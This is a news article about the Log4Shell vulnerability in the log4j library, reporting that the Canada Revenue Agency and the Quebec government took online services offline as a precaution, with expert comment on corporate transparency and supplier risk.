Several government agency websites, both federal and provincial, were forced to shut down after news of a critical software vulnerability surfaced.
The zero-day vulnerability called “Log4Shell” was discovered in late December – it had gone unnoticed since 2013. It involves a previously unknown vulnerability in the open-source logging library log4j, which is widely used by various apps and services. By exploiting the vulnerability, cyber attackers can execute code remotely on servers and introduce malware to the systems.
Security experts believe Log4Shell affects hundreds of millions of devices worldwide.
In light of the vulnerability’s discovery, the Canada Revenue Agency (CRA) last week took several of its online services down, preventing users from accessing their accounts.
“The CRA has become aware of a security vulnerability affecting organizations around the world. As a precaution, we have proactively decided to take our systems offline while we work to secure our systems,” a notice from the CRA said, adding that the agency has no indication that its systems have been compromised, nor has there been any sign that a taxpayer’s information had been accessed by an unauthorized individual.
Over the weekend, the Quebec government also shut down nearly 4,000 of its websites as a precaution against the exploit. Websites related to education, health, and public administration were affected by the shutdown.
Quebec minister for government digital transformation Éric Caire said that there is no indication that the government was the victim of a successful cyber attack, CBC News reported.
Experts have offered reminders that private companies are also vulnerable to the same software exploit.
Patrick Mathieu, the co-founder of the Quebec-based computer security event Hackfest, told The Canadian Press that he is concerned about the lack of communication from major companies such as banks about how they are working to address the vulnerability.
“Yes, the [Quebec] government shut this down, but what about big institutions, finance, insurance, mortgage, medical companies? Are they working on the issue?” said Mathieu. “The lack of transparency right now, it’s dangerous.”
Sumit Bhatia, a director of the Rogers Cybersecure Catalyst at the Ryerson University, explained that even if small and medium businesses are not developing frameworks using log4j, they might still be using products and services from developers that do.
“And it’s important to them to reach out to their service providers and ask about the steps that have been taken,” the university expert noted.